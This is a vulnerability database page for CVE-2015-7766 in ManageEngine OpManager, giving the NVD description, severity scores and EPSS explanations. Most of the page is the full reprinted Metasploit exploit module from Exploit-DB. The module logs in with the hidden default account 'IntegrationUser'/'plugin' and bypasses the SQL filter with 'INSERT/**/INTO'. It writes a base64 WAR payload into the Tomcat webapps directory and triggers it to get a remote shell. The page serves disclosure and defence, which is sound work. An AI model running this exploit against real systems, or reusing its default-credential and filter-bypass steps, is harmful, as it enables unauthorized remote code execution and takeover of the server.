CVE-2015-7766
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
PGSQL:SubmitQuery.do in ZOHO ManageEngine OpManager 11.6, 11.5, and earlier allows remote administrators to bypass SQL query restrictions via a comment in the query to api/json/admin/SubmitQuery, as demonstrated by "INSERT/**/INTO."
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9 | AV:N/AC:L/Au:S/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 38221
Publication date : 2015-09-16 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# It removes large object in database, shoudn't be a problem, but just in case....
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ManageEngine OpManager Remote Code Execution',
'Description' => %q{
This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which can not be reset through the user interface. By
log-in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload. This
module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
],
'References' =>
[
[ 'EDB', '38174' ],
],
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
'Targets' =>
[
['ManageEngine OpManager v11.6', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 14 2015',
'DefaultTarget' => 0))
end
def uri
target_uri.path
end
def check
# Check version
vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'LoginPage.do')
})
unless res && res.code == 200
return Exploit::CheckCode::Safe
end
if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
version = $1
if Gem::Version.new(version) <= Gem::Version.new('11.6')
return Exploit::CheckCode::Appears
else
# Patch unknown
return Exploit::CheckCode::Detected
end
elsif res.body =~ /OpManager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def sql_query( key, query )
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
'vars_get' => { 'apiKey' => key },
'vars_post' => { 'query' => query }
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
end
res
end
def exploit
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'jsp', 'Login.do'),
'vars_post' => {
'domainName' => 'NULL',
'authType' => 'localUserLogin',
'userName' => 'IntegrationUser', # Hidden user
'password' => 'plugin' # Password of hidden user
}
})
if res && res.code == 302
redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
print_status("#{peer} - Location is [ #{redirect} ]")
else
fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => redirect,
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
api_key = $1
print_status("#{peer} - Retrieved API key [ #{api_key} ]")
else
fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
end
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')
print_status("#{peer} - Executing SQL queries")
# Remove large object in database, just in case it exists from previous exploit attempts
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
sql = 'SELECT lo_create(-1)'
result = sql_query(api_key, sql)
if result.body =~ /lo_create":([0-9]+)}/
lo_id = $1
else
fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
end
# Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
sql_query(api_key, sql)
# Export our large object id data into a WAR file
sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
sql_query(api_key, sql)
# Remove our large object in the database
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
register_file_for_cleanup("tomcat//webapps//#{app_base}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
Products Mentioned
Configuraton 0
Zohocorp>>Manageengine_opmanager >> Version To (including) 11.5
- Zohocorp>>Manageengine_opmanager >> Version - (Open CPE detail)
- Zohocorp>>Manageengine_opmanager >> Version 8 (Open CPE detail)
- Zohocorp>>Manageengine_opmanager >> Version 11.4 (Open CPE detail)
- Zohocorp>>Manageengine_opmanager >> Version 11.5 (Open CPE detail)
Zohocorp>>Manageengine_opmanager >> Version 11.6
References
https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
http://www.rapid7.com/db/modules/exploit/windows/http/manage_engine_opmanager_rce
Tags : x_refsource_MISC
Tags : x_refsource_MISC
http://packetstormsecurity.com/files/133596/ManageEngine-OpManager-Remote-Code-Execution.html
Tags : x_refsource_MISC
Tags : x_refsource_MISC
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.